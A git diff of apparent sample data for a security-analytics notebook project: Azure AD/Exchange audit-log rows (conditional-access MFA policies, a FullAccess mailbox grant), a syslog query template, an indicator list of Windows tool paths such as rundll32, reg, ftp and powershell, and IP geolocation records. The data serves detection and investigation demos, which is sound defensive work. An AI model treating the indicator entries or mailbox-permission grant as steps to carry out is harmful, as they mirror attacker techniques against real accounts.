+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:33Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:33 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:36:37Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-14T05:58:49Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-14T11:38:54Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-14T17:40:12Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-15T05:44:12Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-15T03:09:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-15T03:09:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:56Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:56 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:56 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T03:09:56Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/15/2020 3:09:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T06:55:58Z,,,Add-MailboxPermission,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""Julian Isla""
+  },
+  {
+    ""Name"": ""User"",
+    ""Value"": ""NAMPR06A007\\Mega54612-1308911214""
+  },
+  {
+    ""Name"": ""AccessRights"",
+    ""Value"": ""FullAccess""
+  },
+  {
+    ""Name"": ""InheritanceType"",
+    ""Value"": ""All""
+  }
+]"
diff --git a/docs/notebooks/data/example.yaml b/docs/notebooks/data/example.yaml
new file mode 100644
index 000000000..8aa23ebe6
--- /dev/null
+++ b/docs/notebooks/data/example.yaml
@@ -0,0 +1,60 @@
+metadata:
+  version: 1
+  description: Linux Syslog Example Queries
+  data_environments: [LogAnalytics]
+  data_families: [LinuxSyslog]
+  tags: ['linux', 'syslog', 'example']
+defaults:
+  metadata:
+    data_source: 'linux_syslog'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'Syslog'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project
+            TenantId,
+            Computer,
+            Facility,
+            TimeGenerated,
+            HostName,
+            SeverityLevel,
+            SyslogMessage,
+            ProcessID,
+            ProcessName,
+            HostIP,
+          | extend TimeCreatedUtc=TimeGenerated'
+sources:
+  syslog_example:
+    description: Example query
+    args:
+      query: '
+        {table}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Computer == "{host_name}"
+        | take 5'
+    parameters:
+      host_name:
+        description: Hostname to query for
+        type: str
+  
\ No newline at end of file
diff --git a/doc/data/host_logons.csv b/docs/notebooks/data/host_logons.csv
similarity index 100%
rename from doc/data/host_logons.csv
rename to docs/notebooks/data/host_logons.csv
diff --git a/doc/data/ioc_df.csv b/docs/notebooks/data/ioc_df.csv
similarity index 98%
rename from doc/data/ioc_df.csv
rename to docs/notebooks/data/ioc_df.csv
index 0af1afc10..05ced6e3c 100644
--- a/doc/data/ioc_df.csv
+++ b/docs/notebooks/data/ioc_df.csv
@@ -3,7 +3,7 @@
 1,windows_path,.\ftp,0
 2,windows_path,.\reg,1
 3,windows_path,.\rundll32,3
-4,windows_path,c:\users\MSTICAdmin\12345.exe,4
+4,windows_path,c:\users\MSTICAdmin\42424.exe,4
 5,windows_path,.\rundll32,4
 6,windows_path,.\rundll32,5
 7,windows_path,.\rundll32,6
@@ -128,4 +128,4 @@
 126,windows_path,c:\Diagnostics\WindowsSimulateDetections.bat,115
 127,windows_path,C:\Windows\System32\win32calc.exe,116
 128,windows_path,.\powershell,0
-129,windows_path,.\powershell,0
+129,windows_path,.\powershell,0
\ No newline at end of file
diff --git a/docs/notebooks/data/ip_entities.pkl b/docs/notebooks/data/ip_entities.pkl
new file mode 100644
index 000000000..1caafb1ad
Binary files /dev/null and b/docs/notebooks/data/ip_entities.pkl differ
diff --git a/docs/notebooks/data/ip_locs.csv b/docs/notebooks/data/ip_locs.csv
new file mode 100644
index 000000000..7da31e9ce
--- /dev/null
+++ b/docs/notebooks/data/ip_locs.csv
@@ -0,0 +1,88 @@
+,AllExtIPs,CountryCode,CountryName,State,City,Longitude,Latitude,Asn,edges,Type,AdditionalData,IpAddress
+0,65.55.44.109,US,United States,Virginia,Boydton,-78.375,36.6534,,set(),geolocation,{},65.55.44.109
+1,13.71.172.128,CA,Canada,Ontario,Toronto,-79.4195,43.6644,,set(),geolocation,{},13.71.172.128
+2,13.71.172.130,CA,Canada,Ontario,Toronto,-79.4195,43.6644,,set(),geolocation,{},13.71.172.130
+3,40.124.45.19,US,United States,Texas,San Antonio,-98.4926,29.4221,,set(),geolocation,{},40.124.45.19
+4,104.43.212.12,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},104.43.212.12
+5,40.77.232.95,US,United States,Wyoming,Cheyenne,-104.8117,41.1437,,set(),geolocation,{},40.77.232.95
+6,13.107.4.50,US,United States,,,-97.822,37.751,,set(),geolocation,{},13.107.4.50
+7,40.77.228.69,US,United States,Virginia,Boydton,-78.375,36.6534,,set(),geolocation,{},40.77.228.69
+8,172.217.15.99,US,United States,,,-97.822,37.751,,set(),geolocation,{},172.217.15.99
+9,40.85.232.64,CA,Canada,Ontario,Toronto,-79.4195,43.6644,,set(),geolocation,{},40.85.232.64
+10,20.38.98.100,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},20.38.98.100
+11,23.96.64.84,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},23.96.64.84
+12,65.55.44.108,US,United States,Virginia,Boydton,-78.375,36.6534,,set(),geolocation,{},65.55.44.108
+13,131.107.147.209,US,United States,Washington,Redmond,-122.1257,47.6722,,set(),geolocation,{},131.107.147.209
+14,10.0.3.4,,,,,,,,,,,
+15,10.0.3.5,,,,,,,,,,,
+16,13.82.152.48,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},13.82.152.48
+17,8.249.241.254,US,United States,,,-97.822,37.751,,set(),geolocation,{},8.249.241.254
+18,40.77.226.250,IE,Ireland,Leinster,Dublin,-6.2489,53.3331,,set(),geolocation,{},40.77.226.250
+19,13.65.107.32,US,United States,Texas,San Antonio,-98.4926,29.4221,,set(),geolocation,{},13.65.107.32
+20,13.67.143.117,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},13.67.143.117
+21,52.165.170.112,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},52.165.170.112
+22,52.173.28.179,US,United States,Iowa,Des Moines,-93.6127,41.6015,,set(),geolocation,{},52.173.28.179
+23,52.168.138.145,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},52.168.138.145
+24,13.68.93.109,US,United States,Virginia,Boydton,-78.375,36.6534,,set(),geolocation,{},13.68.93.109
+25,65.52.108.92,US,United States,Virginia,Boydton,-78.375,36.6534,,set(),geolocation,{},65.52.108.92
+26,23.48.36.78,US,United States,Virginia,Ashburn,-77.4728,39.0481,,set(),geolocation,{},23.48.36.78
+27,23.223.3.100,US,United States,New York,New York,-74.0066,40.7126,,set(),geolocation,{},23.223.3.100
+28,205.185.216.42,US,United States,,,-97.822,37.751,,set(),geolocation,{},205.185.216.42
+29,13.83.149.5,US,United States,California,San Jose,-121.8914,37.3388,,set(),geolocation,{},13.83.149.5
+30,13.83.148.235,US,United States,California,San Jose,-121.8914,37.3388,,set(),geolocation,{},13.83.148.235
+31,8.253.45.249,US,United States,,,-97.822,37.751,,set(),geolocation,{},8.253.45.249
+32,72.21.91.29,US,United States,,,-97.822,37.751,,set(),geolocation,{},72.21.91.29
+33,72.21.81.240,US,United States,,,-97.822,37.751,,set(),geolocation,{},72.21.81.240
+34,168.62.32.212,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},168.62.32.212
+35,40.121.3.131,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},40.121.3.131
+36,52.239.152.10,US,United States,Virginia,Washington,-78.1539,38.7095,,set(),geolocation,{},52.239.152.10
